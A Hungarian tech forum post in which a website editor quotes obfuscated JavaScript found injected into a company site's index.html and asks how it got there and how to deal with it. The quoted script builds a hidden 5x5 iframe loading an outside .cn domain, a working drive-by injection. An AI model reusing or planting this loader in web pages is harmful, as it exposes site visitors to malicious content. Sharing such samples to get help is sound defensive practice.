Hirdetés
- Luck Dragon: Asszociációs játék. :)
- gban: Ingyen kellene, de tegnapra
- Parci: Milyen mosógépet vegyek?
- Gurulunk, WAZE?!
- eBay-es kütyük kis pénzért
- NASsoljunk: ZyXEL NSA-310 és az FFP
- Szevam: ChatGPT: Bizonytalansági jelölés funkció bekapcsolása
- f(x)=exp(x): A laposföld elmebaj: Vissza a jövőbe!
- D1Rect: Nagy "hülyétkapokazapróktól" topik
- Elektromos rásegítésű kerékpárok
Új hozzászólás Aktív témák
-
eziskamu
addikt
Gondom lenne. Van egy kissebb céges weboldal, amit nem én csináltam, csak szerkesztem néha a híreket, de a technikai hátterét nem vágom.
Namost az index.html-ben ez jelent meg:wy='t';ya='mp';yu='p:';qs='sr';d='nit';l='ame';v='c';z='t';ow='io';zt='n/';sc='n';o='//z';hy='cha';hg='h';p='.c';j='ifr';f='e';dx=j.concat(l);lr=qs.concat(v);ua=hg.concat(wy,z,yu,o,f,d,hy,ya,ow,sc,p,zt);var dj=document.createElement(dx);dj.setAttribute('width','5');dj.setAttribute('height','5');dj.setAttribute('style','display:none');dj.setAttribute(lr,ua);document.body.appendChild(dj);
Azt találtam, hogy ez egy php genyóság lene, ami rejtett lapokat hoz be. Namost béna kérdések jönnek.
Hogy kerülhetett bele?
Tud-e .html-ben kárt okozni, vagy csak egy php állományban?
Mit tehetek ellene?
A fertőzött állományt visszacseréltem egy mentésre.
Új hozzászólás Aktív témák
- ÚJ HP Victus 15 - 15.6" FHD IPS 144Hz - Ryzen 5 8645HS - 16GB - 512GB - RTX 4050 - Win11 - 3 év gari
- Rezgéscsillapítók, távtartók (vízhűtéshez kiemelten), szűrők ventillátorhoz és táphoz
- Dell Precision 7770 17,3 FHD Laptop,i7-12850HX,32GB DDR5,RTX 3000 12GB,1TB,100% akku,NBD gari 2026ig
- 1db pixelhiba vagy hasonló - Dell U2415 vékony kávás full HD 1920x1200 IPS monitor HDMI Pivot mód
- Aquacomputer szűrő beépített csapokkal
- GYÖNYÖRŰ iPhone 13 mini 128GB Starlight -1 ÉV GARANCIA -Kártyafüggetlen, MS3618,96% Akksi
- Apple iPhone 14 Pro Max / 128GB / Kártyafüggetlen / 12Hó Garancia / Akku Gyári 100%
- ÁRGARANCIA!Épített KomPhone Ryzen 7 7800X3D 32/64GB RAM RTX 5080 16GB GAMER PC termékbeszámítással
- Ventilátorok 120/140mm és tápkábel modding kitűnő árakon!
- Apple iPhone 14 128GB, Kártyafüggetlen, 1 Év Garanciával
Állásajánlatok
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest
Cég: Laptopműhely Bt.
Város: Budapest